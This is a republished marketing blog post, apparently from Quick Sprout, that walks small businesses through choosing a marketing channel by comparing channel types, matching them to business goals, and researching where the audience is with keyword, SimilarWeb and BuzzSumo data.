Industry Statistics Social Media Ad Spending Set to Exceed US 35 Billion Best Digital Marketing Agency Malaysia

I say all this to make a simple point.

While you may zone in on one channel, you’ll see lots of overlap that you shouldn’t ignore.

Go where your audience takes you.

Let’s look at some of your options.

Content marketing

This is about creating and promoting material that is relevant to your target audience.

Content marketing is central.

90% of businesses market using this channel.

Content Marketing Strategy Top 12 Proven Ways You Must Follow

It means that no matter what strategy you use, content will be a part of it.

You can narrow your content down to blogging, guest blogging, podcasts, webinars, email, etc.

Social media marketing

You can use social media as your platform to get noticed, build authority, and grow a community.

You can also use it to drive traffic to your main site.

Or you can do both. It’s effective either way.

Paid advertising

Much of marketing is organic and will take time to generate results.

Paid advertising is one way to accelerate that.

The downside is, you have to pay to play.

Facebook ads, other social media ads, print ads, PPC, and direct response fall into this category.

Public relations  

PR is about building relationships and capitalizing on the optics of your business.

It can be both online and offline. Press releases, conferences, events, interviews, and sponsorships are a few examples.

As you can see, you have no shortage of options when it comes to marketing.

I’ve given an overview of the main ones, but know that you are not limited to these alone.

Step #2: Choose the channels that are aligned with your business goals

You now have an idea of what’s available to you.

It’s time to make a list of all the channels that will serve your business.

Start with your business goals.

Some marketing channels are better suited to achieve a particular goal than others.

Goal setting is a flexible thing. You can make changes as your business evolves.

This means that the marketing channel you use right now may not be viable when your business progresses.

Consider what stage your business is in and what your goal is for the next 90 days.

According to Jay Abraham, there are only three ways to grow a business:

  • Increase your number of customers
  • Increase the amount that a customer spends on a purchase
  • Increase the frequency that a customer buys from you

infographic idology 3 waysto grow your business small jpg 468 523 pixels

Your business goals should serve one of these three phases of business.

If you’re still at the first stage, your goals might be brand awareness, lead generation, and customer acquisition.

If you already have a list of buyers, your goal might be to increase sales.

What if you already have a reliable stream of sales?

There’s no such thing as too many sales, but your goal at this point might be to maximize profits and retain customers.

Here’s what most businesses are prioritizing:

20 Lead Nurturing Statistics Charts for 2017

These may or may not apply to you. Just focus on what your business needs at the moment.

This way, you don’t make goals that aren’t yet attainable.

By extension, it ensures that you don’t waste time and resources on a marketing channel that won’t serve your business well.

How do you select a channel that’s right for your business goals?

Before you even start testing, do some elimination.

I’ll give you a few examples, and you’ll have to use your judgment.

Let’s say that your goal is brand awareness.

PR, social media, content marketing, and even paid advertising can be used for this purpose.

The easy solution?

Eliminate the channels that would be less efficient.

For instance, paid advertising won’t be the most useful for brand awareness.

But for sales or lead generation? It can crush it! (If you know what you’re doing, that is).

Take a look at some of the business goals that apply to the content marketing channel. It will give you an idea of what to aim for.


It’s also important to take into consideration what feels the most organic for your business.

If you’re selling something like hoverboards or bicycles, would blog posts serve you the best?

Likely not.

These products are lifestyle-based. You’d be better off using a visual channel that will allow you to provide an experience to potential customers.

Immediately, social media comes to mind.

Then you begin to narrow it down to Instagram or Youtube.

This is a logical process that won’t take you more than an hour to figure out.

You don’t have to find that one channel yet. Just eliminate what won’t work and rank your remaining options.

Step #3: Narrow down the list by going where your audience is

You’ve got a few options.

It’s time to prioritize.

This one is easy. Find your potential customers.

A marketing channel can serve your goal, but there are many platforms you can focus on.

If your customers are not hanging out there, you’ll be wasting your time.


The point of this article is not to find you a slam dunk marketing channel right away.

That would take testing and experimentation.

The goal here is to help you validate your chosen channel. This way, you know it’s viable before you start testing it.

Here’s my best advice for finding out where the attention is.

  • SEO is a great place to start.
  • Competitive research is a must.
  • You can’t go wrong with social media.

Let’s look at each of these.


Online is where most of the magic happens.

And a majority of online interactions begin with a search engine (mostly Google).

So the first step is to evaluate the SEO landscape by searching for keywords in your industry.

You’ll find out what your audience is searching for and how often.

This is not just essential for finding out what’s happening online. Let’s say that there aren’t that many monthly searches for your keywords.

You may want to focus on an offline channel.

Or you may decide that this is a gap that you can take advantage of.

You won’t know until you do some basic keyword research.

A simple tool like the Google Keyword Planner will work.

Type in your keyword and get search volume data.

Keyword Planner Google AdWords

Competitive research

If you want to know where your customers hang out, find your competitors.

First, identify who those competitors are.

A simple google search will do the trick. The biggest players are those who rank on the first page of search.

Once you’ve got a solid list, use a tool like SimilarWeb for your research.

Enter your competitor’s website and press enter.

Quicksprout com Analytics Market Share Stats Traffic Ranking

You’ll find a range of data. Pay attention to “Traffic sources.”

Quicksprout com Analytics Market Share Stats Traffic Ranking 3

For Quick Sprout, the highest traffic source is search.

Naturally, my primary marketing channel would be SEO and blogging.

Direct is a close second, but it’s a bit trickier to figure out.

It represents the people who type in your URL directly into their search bar. It doesn’t tell you where these people first came into contact with your business.

The next step is to check out the individual breakdown of each traffic source.

You can see where referrals are coming from.

Quicksprout com Analytics Market Share Stats Traffic Ranking 4

Since SEO is my dominant traffic source, I’ll pay particular attention to my top organic keywords.

Quicksprout com Analytics Market Share Stats Traffic Ranking 2

You can also see which social media platform is the most popular. Mine is Facebook.

Quicksprout com Analytics Market Share Stats Traffic Ranking 1

Social media

I like to take social media research a bit further.

The tool to use is BuzzSumo.

Type in your competitor’s domain. You can also search for a keyword.

BuzzSumo Find the Most Shared Content and Key Influencers

You’ll see all the top performing content on the site and which social platform generated the most shares.

Using SimilarWeb, we saw that Facebook was Quick Sprout’s top platform.

BuzzSumo tells the same story.

quicksprout com Most Shared Content

If you want to take this a bit further, you can go to these individual platforms and do some sleuthing.

Check out the groups with the most members, listen in on the conversations, and a get a feel for where your audience is focusing their attention.

When you go through this process, you may find that you have 2 or 3 reliable options.

Which do you select?

I have three criteria.

Cheap. Fast. Easy.

You want to pick a channel that won’t cost you too much, if anything, to get started.

You also want a channel that doesn’t have a steep learning curve. Otherwise, you may spend too much time and money trying to figure it out.

Lastly, pick the channel that will allow you to make the most headway, quickly.

You must pick one, so use these criteria as the final litmus test.


Selecting a new marketing channel is a tall order.

It’s important that you take some time to validate a potential channel before you focus on it.

Marketing requires time that can easily be wasted on ineffective strategies.

It also requires cash.

It means that you’d want to see a solid return on both your time and money investment.

The surest way to secure an attractive ROI is to vet potential marketing channels first.

You can then test and double down on what’s working.

Most people don’t go through this process of validation and testing.

So as long as you keep experimenting and tweaking your strategy based on your results, you’ll have a significant advantage over competitors.

What is your most effective marketing channel?

Source: http://ift.tt/UU7LJr